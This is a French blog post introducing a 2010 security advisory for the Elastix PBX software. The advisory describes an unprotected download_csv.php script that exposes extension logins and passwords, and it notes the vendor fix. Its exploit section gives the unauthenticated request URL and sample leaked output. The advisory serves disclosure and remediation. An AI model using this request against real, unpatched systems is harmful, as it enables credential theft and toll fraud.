Bonjour,
Voici un rapport de vulnérabilité pour la distribution Elastix, ça fait très longtemps que le fournisseur a été notifié, mais le fournisseur désirait attendre la version 2.0 d’Elastix avant la publication de cette vulnérabilité ne soit publiée (le correctif a été intégré dans la revision 1550 d’Elastix). Pour ceux qui ont assisté à ma conférence à Confoo 2010, cette vulnérabilité avait servit d’exemple pour démontrer que parfois une simple erreur peut causer bien des problèmes !
Bonne lecture !
Advisory: MEDS-2010-03 - Elastix unsecure extensions configuration download Release Date: 2010-01-13 Author: Francois Harvey, gestion medsecure (francois.harvey at medsecure dot ca) - http://medsecure.ca Application: Elastix 1.6.X, Elastix 2 (Beta), Fixed in 2.0 Severity: High Risk: High Vendor Status: notified 2010-01-13, Fixed in the Last Release (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550) OVERVIEW "Elastix is an appliance software that integrates the best tools available for Asterisk-based PBXs into a single, easy-to-use interface. It also adds its own set of utilities and allows for the creation of third party modules to make it the best software package available for open source telephony." VULNERABILITY Elastix have a script to dump the extensions configuration (with both login & password), the script download_csv.php is not protected by ACL, so everybody can call this script. EXPLOIT https://x.x.x.x/modules/extensions_batch/libs/download_csv.php [^] ---------------------- Display Name,"User Extension","Direct DID","Outbound CID","Call Waiting","Secret","Voicemail Status","Voicemail Password","VM Email Address","VM Pager Email Address","VM Options","VM Email Attachment","VM Play CID","VM Play Envelope","VM Delete Vmail","Context" test,"123","","","DISABLED","my_secret_password","disable","","","","","no","no","no","no","from-internal" ---------------------- SOLUTION Fixed by the Elastix Team. (http://elastix.svn.sourceforge.net/viewvc/elastix?view=revision&revision=1550)